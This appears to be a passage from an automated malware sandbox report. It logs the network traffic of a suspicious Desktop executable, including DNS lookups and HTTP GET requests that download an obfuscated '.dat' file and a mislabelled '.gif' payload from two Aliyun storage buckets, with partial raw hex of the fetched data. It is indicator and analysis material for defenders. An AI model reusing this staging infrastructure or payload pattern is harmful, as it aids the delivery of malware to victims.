                                                  Jan 7, 2025 09:59:40.075757980 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:40.685818911 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:40.685842991 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:40.875305891 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:40.875370026 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:40.875550985 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:40.875690937 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:40.875705004 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.113259077 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.113457918 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.113894939 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.113908052 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.114079952 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.114085913 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.452200890 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.452219963 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.452394009 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.452423096 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.452469110 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.452769041 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.452821016 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.453895092 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.453959942 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.456892967 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.456949949 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.538748980 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.538892984 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.538928032 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.538938046 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.538949966 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.538978100 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.539603949 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.539658070 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.539664984 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.539688110 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.539702892 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.539733887 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.539907932 CET49982443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.539921999 CET4434998239.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.554364920 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.554403067 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:42.554475069 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.554665089 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:42.554677010 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:43.789577007 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:43.789741039 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:43.790124893 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:43.790133953 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:43.790348053 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:43.790352106 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:44.127227068 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:44.127243996 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:44.127418041 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:44.127439976 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:44.127490044 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:44.127739906 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:44.127790928 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:44.127794981 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:44.127820015 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:44.127837896 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:44.127867937 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:44.128391981 CET49983443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:44.128403902 CET4434998339.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:57.441032887 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:57.441066980 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:57.441140890 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:57.562891006 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:57.562903881 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:58.925060034 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:58.925194025 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:58.925230980 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:58.925714016 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:58.925762892 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:58.991131067 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:58.991141081 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:58.991367102 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:58.991422892 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:58.994777918 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.035331011 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.365437031 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.365458012 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.365535021 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.365546942 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.365595102 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.365747929 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.365801096 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.367620945 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.367685080 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.372287035 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.372350931 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.453751087 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.453826904 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.454200983 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.454260111 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.454288006 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.454334974 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.455091000 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.455157042 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.455797911 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.455871105 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.455876112 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.455885887 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 09:59:59.455929995 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.456141949 CET49984443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 09:59:59.456154108 CET44349984118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:01.440428972 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:01.440480947 CET44349985118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:01.440624952 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:01.440896034 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:01.440915108 CET44349985118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:02.751487017 CET44349985118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:02.752743006 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:02.753313065 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:02.753325939 CET44349985118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:02.753490925 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:02.753495932 CET44349985118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:03.109143972 CET44349985118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:03.109199047 CET44349985118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:03.109267950 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:03.109308958 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:03.230927944 CET49985443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:03.230952978 CET44349985118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:03.358967066 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:03.358999014 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:03.359082937 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:03.359277964 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:03.359288931 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:04.700548887 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:04.700649977 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:04.701112986 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:04.701122999 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:04.701359034 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:04.701363087 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.068701029 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.068718910 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.068800926 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.068815947 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.068867922 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.069426060 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.069482088 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.071163893 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.071223974 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.075911045 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.075965881 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.155443907 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.155474901 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.155524015 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.155529976 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.155564070 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.155580044 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.155823946 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.155878067 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.156361103 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.156414986 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.157691956 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.157744884 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.157896042 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.157948017 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.160120010 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.160166025 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.162607908 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.162661076 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.162777901 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.162831068 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.163069963 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.163114071 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.163116932 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.163156986 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.163269997 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.163280010 CET44349986118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.163289070 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.163331032 CET49986443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.182822943 CET49987443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.182877064 CET44349987118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:05.183046103 CET49987443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.183172941 CET49987443192.168.2.5118.178.60.9
                                                  Jan 7, 2025 10:00:05.183185101 CET44349987118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:06.530263901 CET44349987118.178.60.9192.168.2.5
                                                  Jan 7, 2025 10:00:06.530322075 CET49987443192.168.2.5118.178.60.9
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 7, 2025 09:59:24.182765961 CET6414453192.168.2.51.1.1.1
                                                  Jan 7, 2025 09:59:24.692214966 CET53641441.1.1.1192.168.2.5
                                                  Jan 7, 2025 09:59:56.997740030 CET5750953192.168.2.51.1.1.1
                                                  Jan 7, 2025 09:59:57.344479084 CET53575091.1.1.1192.168.2.5
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 7, 2025 09:59:24.182765961 CET192.168.2.51.1.1.10xbe2dStandard query (0)yuqi7x.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                  Jan 7, 2025 09:59:56.997740030 CET192.168.2.51.1.1.10x1cd0Standard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 7, 2025 09:59:24.692214966 CET1.1.1.1192.168.2.50xbe2dNo error (0)yuqi7x.oss-cn-beijing.aliyuncs.comsc-2zu9.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 7, 2025 09:59:24.692214966 CET1.1.1.1192.168.2.50xbe2dNo error (0)sc-2zu9.cn-beijing.oss-adns.aliyuncs.comsc-2zu9.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 7, 2025 09:59:24.692214966 CET1.1.1.1192.168.2.50xbe2dNo error (0)sc-2zu9.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.93A (IP address)IN (0x0001)false
                                                  Jan 7, 2025 09:59:57.344479084 CET1.1.1.1192.168.2.50x1cd0No error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 7, 2025 09:59:57.344479084 CET1.1.1.1192.168.2.50x1cd0No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 7, 2025 09:59:57.344479084 CET1.1.1.1192.168.2.50x1cd0No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                  • yuqi7x.oss-cn-beijing.aliyuncs.com
                                                  • 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.54997739.103.20.934434028C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 08:59:26 UTC111OUTGET /i.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: yuqi7x.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 08:59:26 UTC559INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 08:59:26 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 512
                                                  Connection: close
                                                  x-oss-request-id: 677CECEE5423BA33375AE978
                                                  Accept-Ranges: bytes
                                                  ETag: "F353D2D8E10D0A068FBDCBE69964B426"
                                                  Last-Modified: Tue, 07 Jan 2025 03:44:42 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 11485896019650824832
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 81PS2OENCgaPvcvmmWS0Jg==
                                                  x-oss-server-time: 17
                                                  2025-01-07 08:59:26 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 49 45 41 59 6e 21 77 36 45 45 1b 55 3b 78 37 30 59 5a 59 5e 39 70 3f 32 5b 4b 47 5c 3f 2f 72 3f 50 52 10 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 1e 12 16 0e 39 76 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 4a 46 42 5a 6d 22 74 35 46 46 18 56 38 7b 34 33 5a 59 5a 5d 3a 73 3c 31 58 48 44 5f 3c 2c 71 3c 53 51 13 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 1f 13 17 0f 38 77 21
                                                  Data Ascii: l%00IEAYn!w6EEU;x70YZY^9p?2[KG\?/r?PR^p97888888888888888888888888888888888PLLH;rgg9v aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33JFBZm"t5FFV8{43ZYZ]:s<1XHD_<,q<SQ_q86999999999999999999999999999999999QMMI:sff8w!


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.54997839.103.20.934434028C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 08:59:28 UTC111OUTGET /a.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: yuqi7x.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 08:59:28 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 08:59:28 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 135589
                                                  Connection: close
                                                  x-oss-request-id: 677CECF09DBA1233399578FE
                                                  Accept-Ranges: bytes
                                                  ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                  Last-Modified: Tue, 07 Jan 2025 03:43:53 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 8642451798640735006
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                  x-oss-server-time: 12
                                                  2025-01-07 08:59:28 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-07 08:59:28 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                                  Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                  2025-01-07 08:59:28 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                                  Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                  2025-01-07 08:59:28 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                                  Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                  2025-01-07 08:59:28 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                                  Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
